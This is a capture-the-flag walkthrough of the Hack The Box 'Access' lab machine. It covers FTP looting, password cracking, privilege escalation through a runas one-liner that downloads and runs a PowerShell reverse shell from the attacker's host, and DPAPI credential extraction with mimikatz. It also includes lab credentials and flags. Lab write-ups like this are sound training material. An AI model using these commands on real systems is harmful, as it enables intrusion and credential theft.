
HTB - Access
Enumeration
Scope
IP Address: 10.10.10.98
Nmap Scan
┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Access]
└─$ nmap -p- --min-rate 10000 $ip -Pn -vv
PORT STATE SERVICE REASON
21/tcp open ftp syn-ack
23/tcp open telnet syn-ack
80/tcp open http syn-ack
┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Access]
└─$ nmap -p21,23,80 $ip -sCV -oN Nmap/script-scan
PORT STATE SERVICE VERSION
21/tcp open ftp Microsoft ftpd
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_Can't get directory listing: PASV failed: 425 Cannot open data connection.
| ftp-syst:
|_ SYST: Windows_NT
23/tcp open telnet?
80/tcp open http Microsoft IIS httpd 7.5
|_http-title: MegaCorp
| http-methods:
|_ Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/7.5
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
* Open ports: 21 - 23 - 80
* UDP Open ports: None
* Services: FTP - TELNET - HTTP
* Versions: Microsoft ftpd - Microsoft IIS httpd 7.5
* Important Notes: Anonymous FTP login allowed (FTP code 230); the TRACE method is enabled on IIS
Enumeration
HTTP
The web app didn't reveal anything except this image at http://10.10.10.98

FTP
I'm used to downloading all files on an FTP server with one command and exploring them locally
┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Access]
└─$ wget -m --no-passive ftp://anonymous:anonymous@$ip
<snip>
FINISHED --2024-07-07 11:19:01--
Total wall clock time: 1m 4s
Downloaded: 5 files, 5.4M in 43s (129 KB/s)
All files were downloaded into the 10.10.10.98 folder
┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Access]
└─$ ls
10.10.10.98 Nmap
┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Access]
└─$ tree 10.10.10.98
10.10.10.98
├── Backups
│ └── backup.mdb
└── Engineer
└── Access Control.zip
Looking into the zip file, it contains a .pst file and is also encrypted
┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Access]
└─$ unzip -l 10.10.10.98/Engineer/Access\ Control.zip
Archive: 10.10.10.98/Engineer/Access Control.zip
Length Date Time Name
--------- ---------- ----- ----
271360 2018-08-24 01:13 Access Control.pst
┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Access]
└─$ file 10.10.10.98/Engineer/Access\ Control.zip
10.10.10.98/Engineer/Access Control.zip: Zip archive data, at least v2.0 to extract, compression method=AES Encrypted
I will get the hash with john the ripper and attempt to crack it
┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Access]
└─$ zip2john Access\ Control.zip > zip.hash
Cracking failed
┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Access]
└─$ john zip.hash --wordlist=/usr/share/wordlists/rockyou.txt
<snip>
Session completed.
┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Access]
└─$ john zip.hash --show
0 password hashes cracked, 1 left
I want to know what that file is, and from the output below it's a Microsoft Access database
┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Access]
└─$ file 10.10.10.98/Backups/backup.mdb
10.10.10.98/Backups/backup.mdb: Microsoft Access Database
I had to move it to a Windows host and explore it.

I found a table that contains usernames & passwords
admin:admin
engineer:access4u@security
backup_admin:admin
I will try telnet with these credentials since there is no SMB service
┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Access]
└─$ hydra -L users.lst -P passwords.list telnet://$ip
1 of 1 target completed, 0 valid password found
Initial Access
I remember that I couldn't crack the zip file, so I will try these passwords to decrypt it
┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Access]
└─$ john zip.hash --wordlist=passwords.list
<snip>
access4u@security (Access Control.zip/Access Control.pst)
┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Access]
└─$ 7z x Access\ Control.zip
<snip>
Enter password (will not be echoed):
Everything is Ok
Size: 271360
Compressed: 10870
It revealed the Access Control.pst file and I wanted to know its type
┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Access]
└─$ file Access\ Control.pst
Access Control.pst: Microsoft Outlook Personal Storage (>=2003, Unicode, version 23), dwReserved1=0x234, dwReserved2=0x22f3a, bidUnused=0000000000000000, dwUnique=0x39, 271360 bytes, bCryptMethod=1, CRC32 0x744a1e2e
It's a Microsoft Outlook Personal Storage file, so I moved it to my Windows host and opened it with Outlook
It contains an email with the following content

Hi there,
The password for the “security” account has been changed to 4Cc3ssC0ntr0ller. Please ensure this is passed on to your engineers.
Regards,
John
So, we get new credentials security:4Cc3ssC0ntr0ller and I will try them on telnet
┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Access]
└─$ telnet $ip
login: security
password:
*===============================================================
Microsoft Telnet Server.
*===============================================================
C:\Users\security>
C:\Users\security>type Desktop\user.txt
713d8fafce27a927227b6a3124c79ea3
User Flag: 713d8fafce27a927227b6a3124c79ea3
Privilege Escalation
When I land on any Windows machine on HTB, I always run cmdkey /list to view saved credentials
C:\Users>cmdkey /list
Currently stored credentials:
Target: Domain:interactive=ACCESS\Administrator
Type: Domain Password
User: ACCESS\Administrator
This can be abused to run commands as admin with the runas command.
Since we can't execute .exe files, I will try to execute a .ps1 as administrator, so I grab Invoke-PowerShellTcp.ps1 from my host, start a web server & nc listener and execute the command as administrator
We must add this line to Invoke-PowerShellTcp.ps1 before executing the shell
Invoke-PowerShellTcp -Reverse -IPAddress 10.10.16.3 -Port 443
Change the IP & port to yours when modifying the file
┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Access]
└─$ python3 -m http.server 80
Netcat listener
┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Access]
└─$ rlwrap nc -lvnp 443
C:\Users\security> runas /savecred /user:ACCESS\Administrator "PowerShell -c IEX (New-Object Net.webclient).DownloadString('http://10.10.16.3/Invoke-PowerShellTcp.ps1')"
┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Access]
└─$ web-server
Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...
10.10.10.98 - - [08/Jul/2024 05:31:42] "GET /Invoke-PowerShellTcp.ps1 HTTP/1.1" 200 -
┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Access]
└─$ rlwrap nc -lvnp 443
listening on [any] 443 ...
connect to [10.10.16.3] from (UNKNOWN) [10.10.10.98] 49161
PS C:\Windows\system32>whoami
access\administrator
PS C:\Windows\system32> cd C:\Users\administrator\Desktop\
PS C:\Users\administrator\Desktop> type root.txt
066b2ca40b4ab07b4387c6e4fe06bc32
Root Flag: 066b2ca40b4ab07b4387c6e4fe06bc32
Alternative path
Since the administrator credentials are stored in the security user's session, we can get the credentials by decrypting the DPAPI secrets
We need two files, the masterkey & the credentials file, and they are located in the current user's directory under C:\Users\Security\AppData\Roaming\Microsoft\ but hidden.
I personally use ls with the -Force flag to list hidden files
C:\Users\security>powershell -c ls -Force C:\Users\Security\AppData\Roaming\Microsoft\
Directory: C:\Users\Security\AppData\Roaming\Microsoft
Mode LastWriteTime Length Name
---- ------------- ------ ----
<snip>
d---s 8/22/2018 10:18 PM Credentials
d---s 8/22/2018 10:18 PM Protect
<snip>
C:\Users\security>powershell -c ls -Force C:\Users\Security\AppData\Roaming\Microsoft\Protect
Directory: C:\Users\Security\AppData\Roaming\Microsoft\Protect
Mode LastWriteTime Length Name
---- ------------- ------ ----
d---s 8/22/2018 10:18 PM S-1-5-21-953262931-566350628-63446256-1001
-a-hs 8/22/2018 10:18 PM 24 CREDHIST
C:\Users\security>powershell -c ls -Force C:\Users\Security\AppData\Roaming\Microsoft\Credentials
Directory: C:\Users\Security\AppData\Roaming\Microsoft\Credentials
Mode LastWriteTime Length Name
---- ------------- ------ ----
-a-hs 8/22/2018 10:18 PM 538 51AB168BE4BDB3A603DADE4F8CA81290
I will encode the two files as base64 and decode them on my attack host
C:\Users\security>powershell -c certutil -encode C:\Users\Security\AppData\Roaming\Microsoft\Protect\S-1-5-21-953262931-566350628-63446256-1001\0792c32e-48a5-4fe3-8b43-d93d64590580 .\key
CertUtil: -encode command completed successfully.
C:\Users\security>powershell -c certutil -encode C:\Users\Security\AppData\Roaming\Microsoft\Credentials\51AB168BE4BDB3A603DADE4F8CA81290 .\key1
CertUtil: -encode command completed successfully.
C:\Users\security>type key
<snip>
C:\Users\security>type key1
<snip>
On the Windows host:
mimikatz # dpapi::masterkey /in:C:\Users\HTB\Desktop\masterkey /sid:S-1-5-21-953262931-566350628-63446256-1001 /password:4Cc3ssC0ntr0ller
**MASTERKEYS**
dwVersion : 00000002 - 2
szGuid : {0792c32e-48a5-4fe3-8b43-d93d64590580}
dwFlags : 00000005 - 5
dwMasterKeyLen : 000000b0 - 176
dwBackupKeyLen : 00000090 - 144
dwCredHistLen : 00000014 - 20
dwDomainKeyLen : 00000000 - 0
[masterkey]
**MASTERKEY**
dwVersion : 00000002 - 2
salt : 9c51ca4d00708c73d4fbff60b95e549e
rounds : 000043f8 - 17400
algHash : 0000800e - 32782 (CALG_SHA_512)
algCrypt : 00006610 - 26128 (CALG_AES_256)
pbKey : e78fb1d989c4ccd7a05285c17fae1c31ad1210f7ada051ae3203536df613e63a0e4647ca9ed51407637d8c1cc2ad16b2306aab56d7d2707b0c77422e7de39eb8bdfcca55044b4a7f853b6f0b3333213b5b0d80c7c1021f6c4ac2f5fa3772adbe50af7fdf07b0e0ea940d70a1245db7df847f615530a93895012a3ad9c7a8c39cc0592d06d714c9ee8fe34ced5062c412
[backupkey]
**MASTERKEY**
dwVersion : 00000002 - 2
salt : 4bb6dd9b5b9656d97b78f114796457f4
rounds : 000043f8 - 17400
algHash : 0000800e - 32782 (CALG_SHA_512)
algCrypt : 00006610 - 26128 (CALG_AES_256)
pbKey : 0fe6b3aa5dd3af46bd7a87cbc0161fc41ae13f8714a22bcb5bda86f24d95ad03369a5335159185d0276743d0c1132b35fdaffad247d3c4f5f43260413c28b401ed70e42e0184f9e8c4668abc36eb7327bd2c7374a2381b4cdd4ea7c465deaa755e0f53672473900db8868b428327edaa
[credhist]
**CREDHIST INFO**
dwVersion : 00000003 - 3
guid : {009668e5-9305-401b-ba0d-dfa0e11b34d0}
[masterkey] with password: 4Cc3ssC0ntr0ller (normal user)
key : b360fa5dfea278892070f4d086d47ccf5ae30f7206af0927c33b13957d44f0149a128391c4344a9b7b9c9e2e5351bfaf94a1a715627f27ec9fafb17f9b4af7d2
sha1: bf6d0654ef999c3ad5b09692944da3c0d0b68afe
Decrypting the credentials file with the masterkey
mimikatz # dpapi::cred /in:C:\Users\HTB\Desktop\credentials
**BLOB**
dwVersion : 00000001 - 1
guidProvider : {df9d8cd0-1501-11d1-8c7a-00c04fc297eb}
dwMasterKeyVersion : 00000001 - 1
guidMasterKey : {0792c32e-48a5-4fe3-8b43-d93d64590580}
dwFlags : 20000000 - 536870912 (system ; )
dwDescriptionLen : 0000003a - 58
szDescription : Enterprise Credential Data
algCrypt : 00006610 - 26128 (CALG_AES_256)
dwAlgCryptLen : 00000100 - 256
dwSaltLen : 00000020 - 32
pbSalt : f5bbbac240bd90d9af7d3c2cfb7f301f1f123ac94d07a3cc012038135fa5a6bc
dwHmacKeyLen : 00000000 - 0
pbHmackKey :
algHash : 0000800e - 32782 (CALG_SHA_512)
dwAlgHashLen : 00000200 - 512
dwHmac2KeyLen : 00000020 - 32
pbHmack2Key : f9642d323fae366a4f7293d02f26e4472adc32b00bac6a061914458dadfd3e52
dwDataLen : 00000100 - 256
pbData : <snip>
dwSignLen : 00000040 - 64
pbSign : 63fcc153bcd60befd074a5098ea0e552f8809562c553985baa8720a828e61e05bd5d1cb8200711551a100ed3b853598b3875ba90b689bc483342fbf671b89c99
Decrypting Credential:
* volatile cache: GUID:{0792c32e-48a5-4fe3-8b43-d93d64590580};KeyHash:bf6d0654ef999c3ad5b09692944da3c0d0b68afe;Key:available
**CREDENTIAL**
credFlags : 00000030 - 48
credSize : 000000f4 - 244
credUnk0 : 00002004 - 8196
Type : 00000002 - 2 - domain_password
Flags : 00000000 - 0
LastWritten : 8/22/2018 9:18:49 PM
unkFlagsOrSize : 00000038 - 56
Persist : 00000003 - 3 - enterprise
AttributeCount : 00000000 - 0
unk0 : 00000000 - 0
unk1 : 00000000 - 0
TargetName : Domain:interactive=ACCESS\Administrator
UnkData : (null)
Comment : (null)
TargetAlias : (null)
UserName : ACCESS\Administrator
CredentialBlob : 55Acc3ssS3cur1ty@megacorp
Attributes : 0
So, the admin credentials are administrator:55Acc3ssS3cur1ty@megacorp
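The two on-disk structures mimikatz parsed above, the masterkey file header and the DPAPI credential blob header, as an added Python example that is not part of the original writeup: it reads the fixed-layout fields (GUID, flags, section lengths, PBKDF2 rounds and algorithms, guidMasterKey, description) from constructed byte strings built with the values shown in the mimikatz output, and checks that a blob's guidMasterKey names the masterkey file it needs. The encrypted key material is a placeholder and nothing is decrypted; the field offsets are assumed from the standard DPAPI on-disk layout.

```python
import struct
import uuid

MK_HEADER_LEN = 128  # fixed-size header that precedes the first MASTERKEY block

def parse_masterkey_file(buf):
    r"""Header fields and first MASTERKEY block of a Protect\<SID>\<GUID> file."""
    version, = struct.unpack_from("<I", buf, 0)
    guid = buf[12:84].decode("utf-16-le")           # 36 UTF-16 chars, same as the file name
    flags, = struct.unpack_from("<I", buf, 92)
    mk_len, bk_len, ch_len, dk_len = struct.unpack_from("<4Q", buf, 96)
    mk_ver, salt, rounds, alg_hash, alg_crypt = struct.unpack_from("<I16sIII", buf, MK_HEADER_LEN)
    pbkey = buf[MK_HEADER_LEN + 32:MK_HEADER_LEN + mk_len]   # still encrypted with the user's password
    return {"version": version, "guid": guid, "flags": flags, "masterkey_len": mk_len,
            "backupkey_len": bk_len, "credhist_len": ch_len, "domainkey_len": dk_len,
            "salt": salt.hex(), "rounds": rounds, "alg_hash": alg_hash,
            "alg_crypt": alg_crypt, "pbkey_len": len(pbkey)}

def parse_blob_header(buf):
    r"""Fields that precede the ciphertext in a DPAPI blob (the Credentials\<hash> file)."""
    version, = struct.unpack_from("<I", buf, 0)
    provider = str(uuid.UUID(bytes_le=buf[4:20]))
    mk_version, = struct.unpack_from("<I", buf, 20)
    mk_guid = str(uuid.UUID(bytes_le=buf[24:40]))   # which masterkey decrypts this blob
    flags, desc_len = struct.unpack_from("<II", buf, 40)
    desc = buf[48:48 + desc_len].decode("utf-16-le").strip("\r\n\0")
    alg_crypt, = struct.unpack_from("<I", buf, 48 + desc_len)
    return {"version": version, "provider": provider, "masterkey_version": mk_version,
            "masterkey_guid": mk_guid, "flags": flags, "description": desc, "alg_crypt": alg_crypt}

def blob_needs_masterkey(blob, mk_file):
    """True when the blob's guidMasterKey names the given masterkey file."""
    return parse_blob_header(blob)["masterkey_guid"] == parse_masterkey_file(mk_file)["guid"]

# Constructed samples using the header values mimikatz printed on this box; the encrypted
# pbKey is a placeholder, and the backup/credhist sections and the blob ciphertext are omitted.
GUID = "0792c32e-48a5-4fe3-8b43-d93d64590580"
SALT = bytes.fromhex("9c51ca4d00708c73d4fbff60b95e549e")
FAKE_PBKEY = bytes(range(144))                          # 176-byte block minus the 32-byte prefix
SAMPLE_MASTERKEY = (struct.pack("<I8x", 2) + GUID.encode("utf-16-le")
                    + struct.pack("<8xI4Q", 5, 176, 144, 20, 0)
                    + struct.pack("<I16sIII", 2, SALT, 17400, 0x800E, 0x6610) + FAKE_PBKEY)
DESC = "Enterprise Credential Data\r\n\0".encode("utf-16-le")   # 58 bytes, dwDescriptionLen 0x3a
SAMPLE_BLOB = (struct.pack("<I", 1) + uuid.UUID("df9d8cd0-1501-11d1-8c7a-00c04fc297eb").bytes_le
               + struct.pack("<I", 1) + uuid.UUID(GUID).bytes_le
               + struct.pack("<II", 0x20000000, len(DESC)) + DESC + struct.pack("<I", 0x6610))

if __name__ == "__main__":
    print(parse_masterkey_file(SAMPLE_MASTERKEY))
    print(parse_blob_header(SAMPLE_BLOB), blob_needs_masterkey(SAMPLE_BLOB, SAMPLE_MASTERKEY))
```

Pointing the two parsers at real files from Protect\<SID>\ and Credentials\ is enough to tell, without any password, which masterkey a given credential blob depends on.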
┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Access]
└─$ telnet $ip
login: administrator
password:
*===============================================================
Microsoft Telnet Server.
*===============================================================
C:\Users\Administrator>type Desktop\root.txt
066b2ca40b4ab07b43xxxxxxxxxxxxx